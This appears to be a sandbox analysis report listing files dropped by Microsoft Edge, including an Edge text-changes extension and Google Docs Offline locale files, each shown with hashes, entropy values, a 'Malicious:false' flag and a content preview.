                                                                                                                                          SHA1:63AD8F8A786F75D6B791333316CB310B2FC4C922
                                                                                                                                          SHA-256:572DF85F7B3911B6EE8689892186293A4A9CFEAE8370418509E43210A6583084
                                                                                                                                          SHA-512:3CAAB599DD480CB18B20C832869F3134EB39B102862213CF90271801EE86C60103954D13BFF8134F8126F103150AE9B4572F458786C4CB01DE410A2D7E840452
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                          C:\Users\user\AppData\Local\Temp\d32f2f51-7702-4f9c-b344-70b157dfbb57.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):98960
                                                                                                                                          Entropy (8bit):7.702941019514499
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:EMgLUGcY3s6U4W3NrUeNWy4cSbJUQyuW+8hXuzoLdN4pu1FIc1/x/iDhoA9lo:bEUGEKer/W0KJIudO6Mn4pu1dpKtoX
                                                                                                                                          MD5:FC21C3084ECE86A867515F4112126D22
                                                                                                                                          SHA1:7AD412386EEDA21136AB332EDCED98AF075CCCD2
                                                                                                                                          SHA-256:378723490592C0627AC18A287F9A9CB74970C3C6E10A177C322282BFC1D01E01
                                                                                                                                          SHA-512:37777D2F86D5586B5DB02FE8DF853814FF0B1FCF0141ADB8CF0A42CE3C15C5DA8F65DE89E2DEB8C13040302F95C6B0FF523A4288C5D38FF7977212AA011B1309
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:Cr24....d"........0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........S.S.H.{..a./-X.....Q.B'E..^...+....3..../`L).&w.e...`...v.V.v.....$.RB..IH.7wJ..a..r....t..b.'.V.5.{.O....5.x........q..........R.I.P.o\.FCx......l.%..5.1......O)d/O H?..S..1.o.gK3.*.6Ug.5<..k.....\........Z............yK.W.?....C..gh...R/.W.....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!.....T...B.l........~_&.K..HH...!.....6]..~.g....n{.f...Q2..Ip..?s".>...........|[s...._.Z......o! 01".]@]]...`...$.t.....vWw.t...d.....CB....M6...0.....6.5M[.......y?.....t....g}..f......m*/.XJ}|s.....m#7.6[U_v[n.......^.j+...y.6:.."P.....}|.w..].>....C..?v......vK.}|.=^....GB.X..x=_.....p.q...#.g:...P....

                                                                                                                                          C:\Users\user\AppData\Local\Temp\daf63fab-98bc-4a4c-a302-f5df4706951f.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):76321
                                                                                                                                          Entropy (8bit):7.996057445951542
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
                                                                                                                                          MD5:D7A1AC56ED4F4D17DD0524C88892C56D
                                                                                                                                          SHA1:4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
                                                                                                                                          SHA-256:0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
                                                                                                                                          SHA-512:31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\eb5b52f4-0d76-4f46-98f4-3277db15b7bb.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_1524039837\97ffb4d8-d282-4e1f-b153-6d3480c5366e.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):11185
                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_1524039837\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1753
                                                                                                                                          Entropy (8bit):5.8889033066924155
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                          MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                          SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                          SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                          SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_1524039837\CRX_INSTALL\content.js

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):9815
                                                                                                                                          Entropy (8bit):6.1716321262973315
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                          MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                          SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                          SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                          SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_1524039837\CRX_INSTALL\content_new.js

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):10388
                                                                                                                                          Entropy (8bit):6.174387413738973
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                          MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                          SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                          SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                          SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_1524039837\CRX_INSTALL\manifest.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):962
                                                                                                                                          Entropy (8bit):5.698567446030411
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                          MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                          SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                          SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                          SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\128.png

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4982
                                                                                                                                          Entropy (8bit):7.929761711048726
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                          MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                          SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                          SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                          SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):908
                                                                                                                                          Entropy (8bit):4.512512697156616
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                          MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                          SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                          SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                          SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1285
                                                                                                                                          Entropy (8bit):4.702209356847184
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                          MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                          SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                          SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                          SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1244
                                                                                                                                          Entropy (8bit):4.5533961615623735
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                          MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                          SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                          SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                          SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):977
                                                                                                                                          Entropy (8bit):4.867640976960053
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                          MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                          SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                          SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                          SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3107
                                                                                                                                          Entropy (8bit):3.535189746470889
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                          MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                          SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                          SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
